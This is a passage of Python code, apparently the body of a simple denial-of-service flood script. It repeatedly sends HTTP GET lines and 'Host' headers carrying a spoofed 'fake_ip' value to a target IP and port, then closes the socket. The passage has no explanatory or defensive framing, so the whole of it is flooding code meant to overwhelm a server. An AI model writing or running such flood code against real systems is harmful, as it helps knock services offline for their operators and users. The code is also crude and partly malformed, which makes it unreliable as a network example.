    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.close()
